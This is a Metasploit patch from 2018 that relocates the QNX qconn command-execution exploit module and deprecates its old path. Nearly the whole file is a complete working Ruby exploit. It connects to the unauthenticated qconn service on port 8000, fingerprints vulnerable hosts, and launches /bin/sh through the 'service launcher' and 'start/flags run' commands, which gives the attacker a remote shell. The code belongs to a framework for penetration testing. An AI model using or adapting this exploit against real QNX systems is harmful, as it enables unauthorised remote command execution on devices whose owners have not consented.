From a14df8d86e906e10931036df6ce688b74b832c03 Mon Sep 17 00:00:00 2001
From: Brendan Coles <bcoles@gmail.com>
Date: Tue, 16 Oct 2018 16:21:28 +0000
Subject: [PATCH] Move exploit/unix/misc/qnx_qconn_exec to
 exploit/qnx/qconn_exec

---
 modules/exploits/qnx/qconn_exec.rb           | 163 +++++++++++++++++++
 modules/exploits/unix/misc/qnx_qconn_exec.rb |   3 +
 2 files changed, 166 insertions(+)
 create mode 100644 modules/exploits/qnx/qconn_exec.rb

diff --git a/modules/exploits/qnx/qconn_exec.rb b/modules/exploits/qnx/qconn_exec.rb
new file mode 100644
index 0000000000..c424b6ce42
--- /dev/null
+++ b/modules/exploits/qnx/qconn_exec.rb
@@ -0,0 +1,163 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'QNX qconn Command Execution',
+      'Description'    => %q{
+        This module uses the qconn daemon on QNX systems to gain a shell.
+
+        The QNX qconn daemon does not require authentication and allows
+        remote users to execute arbitrary operating system commands.
+
+        This module has been tested successfully on QNX Neutrino 6.5.0 (x86)
+        and 6.5.0 SP1 (x86).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'David Odell',  # Discovery
+          'Mor!p3r',      # PoC
+          'Brendan Coles' # Metasploit
+        ],
+      'References'     =>
+        [
+          ['EDB', '21520'],
+          ['URL', 'https://www.optiv.com/blog/pentesting-qnx-neutrino-rtos'],
+          ['URL', 'http://www.qnx.com/developers/docs/6.5.0SP1/neutrino/utilities/q/qconn.html'],
+          ['URL', 'http://www.qnx.com/developers/docs/6.5.0/topic/com.qnx.doc.neutrino_utilities/q/qconn.html']
+        ],
+      'Payload'        =>
+        {
+          'BadChars'    => '',
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType'    => 'cmd_interact',
+              'ConnectionType' => 'find'
+            }
+        },
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 10,
+          'PAYLOAD'  => 'cmd/unix/interact'
+        },
+      'Platform'       => 'unix', # QNX Neutrino
+      'Arch'           => ARCH_CMD,
+      'Targets'        => [['Automatic', {}]],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Sep 4 2012',
+      'DefaultTarget'  => 0))
+    register_options(
+      [
+        Opt::RPORT(8000),
+        OptString.new('SHELL', [true, 'Path to system shell', '/bin/sh'])
+      ])
+  end
+
+  def check
+    vprint_status 'Sending check...'
+
+    connect
+    res = sock.get_once(-1, 10)
+
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    unless res.include? 'QCONN'
+      return CheckCode::Safe
+    end
+
+    sock.put "service launcher\n"
+    res = sock.get_once(-1, 10)
+
+    if res.nil? || !res.include?('OK')
+      return CheckCode::Safe
+    end
+
+    fingerprint = Rex::Text.rand_text_alphanumeric rand(5..10)
+    sock.put "start/flags run /bin/echo /bin/echo #{fingerprint}\n"
+
+    if res.nil? || !res.include?('OK')
+      return CheckCode::Safe
+    end
+
+    Rex.sleep 1
+
+    res = sock.get_once(-1, 10)
+
+    if res.nil? || !res.include?(fingerprint)
+      return CheckCode::Safe
+    end
+
+    disconnect
+
+    CheckCode::Vulnerable
+  end
+
+  def exploit
+    unless check == CheckCode::Vulnerable
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    connect
+    res = sock.get_once(-1, 10)
+
+    unless res
+      fail_with Failure::Unreachable, 'Connection failed'
+    end
+
+    unless res.include? 'QCONN'
+      fail_with Failure::UnexpectedReply, 'Unexpected reply'
+    end
+
+    sock.put "service launcher\n"
+    res = sock.get_once(-1, 10)
+
+    if res.nil? || !res.include?('OK')
+      fail_with Failure::UnexpectedReply, 'Unexpected reply'
+    end
+
+    print_status 'Sending payload...'
+    sock.put "start/flags run #{datastore['SHELL']} -\n"
+
+    Rex.sleep 1
+
+    unless negotiate_shell sock
+      fail_with Failure::UnexpectedReply, 'Unexpected reply'
+    end
+
+    print_good 'Payload sent successfully'
+
+    handler
+  end
+
+  def negotiate_shell(sock)
+    Timeout.timeout(15) do
+      while true
+        data = sock.get_once(-1, 10)
+
+        if !data || data.length.zero?
+          return nil
+        end
+
+        if data.include?('#') || data.include?('No controlling tty')
+          return true
+        end
+
+        Rex.sleep 0.5
+      end
+    end
+  rescue ::Timeout::Error
+    return nil
+  end
+end
diff --git a/modules/exploits/unix/misc/qnx_qconn_exec.rb b/modules/exploits/unix/misc/qnx_qconn_exec.rb
index c424b6ce42..0dd4704a95 100644
--- a/modules/exploits/unix/misc/qnx_qconn_exec.rb
+++ b/modules/exploits/unix/misc/qnx_qconn_exec.rb
@@ -7,6 +7,9 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::Tcp
+  include Msf::Module::Deprecated
+
+  deprecated(Date.new(2018, 10, 17), 'exploit/qnx/qconn_exec')
 
   def initialize(info = {})
     super(update_info(info,